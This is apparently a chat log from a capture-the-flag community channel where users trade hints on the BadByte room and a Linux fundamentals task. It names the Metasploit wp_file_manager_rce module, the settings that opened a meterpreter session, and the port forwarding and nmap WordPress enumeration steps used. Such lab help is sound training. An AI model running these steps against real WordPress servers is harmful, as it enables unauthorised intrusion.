I think I need a metasploit hint. I'm using the exploit multi/http/wp_file_manager_rce (for the BadByte room, task 5). I've set rhosts to 127.0.0.1, rport to 8080, lhost to 127.0.0.1, lport to 4444, and run it. MSF uploads a file to the wordpress site/http server, but the file seems to contain just /*. Adding ?cmd=<command> to the url doesn't seem to do anything

set LHOST to tun0

okay, that opens a meterpreter session. That's new to me. I'll do some reading. Thanks.

Has anyone tried solving badbyte ?

hi
guys i'm stuck at badbyte how can i increase the search limit for the directory traversal \ RCE

i couldn't find those vulnerabilities

I am not able to setup the dynamic port forwarding.

did you find the port number that you need to forward?

--script-args search-limit=

be more specific

are you getting any error

is that in searchsploit command?

no when using nmap script

while scanning the cms

Error : no valid proxy found in config

Although I have added the socks5 /etc/proxychains.conf

can you screen shot the proxyconfig

I did, but I don't have the permission to share it here

!docs verify

pls verify yourself first

@median reef

nmap localhost -p 8080 --script-args --search-limit=1500 -vv
i used this command and it didn't help

it does take time to run the whole scan

it might seem that it is stuck on 0%

it only took 1 second

you gotta specify the script too

did you also local portforward the port 8080 using ssh

yup

i can view the wordpress on my localhost

you missed the script name

nmap --script=script-name --script-args search-limit=1500 -p 8080 127.0.0.1

|| http-wordpress-enum || ?

noice

linux fundamental part 3, task 5, question 1. I don't get this question. How do you find files that have specific permissions?

like I don't understand what to do

in linux there is command that can be used to find files that have specific permissions

ok yes I get that part

and now I need to find it

and the hind is this:

||The man page has this flag||

you need to find what is the flag

for finding permissions

but the hint says to search in the man page

so I tried

||man find||

try man find
and look for what flag do you need to specify in order to search for files based on their permission

if you type /permissions(it will search for string permissions in the manual) you can read the man file easily and find the flag

so just: /permissions ?

it says no such file or directory

yeah

Ok so the only other thing that it says is: -bash but that doesn't work

oh i meant when you open the man find

oh

just type man find
and when the manual appears type "/permission" and look closely

ah yes I got it!

ty 🙂

finally root badbyte fun room lil tuff though

did you learnt something new?

yeah

but i really wanna learn how to do it manually instead of using msf

Did u scream "im in" hehe is it hard room tho ?

fuck yeah i scream im in man took me two days

lol

i wrote a whole script to do that manually if you are interested i can dm you the link

what the script

send it

can you pls send me the link too

I'd be interesting in taking a look as well

hey did you use burpsuite to manually do it

no

i mean by manually i wrote a script that did it for me

you can even use manually if you read the POC for the vuln

send me the script ill check it out..

im going to make a video on this room for my youtube channel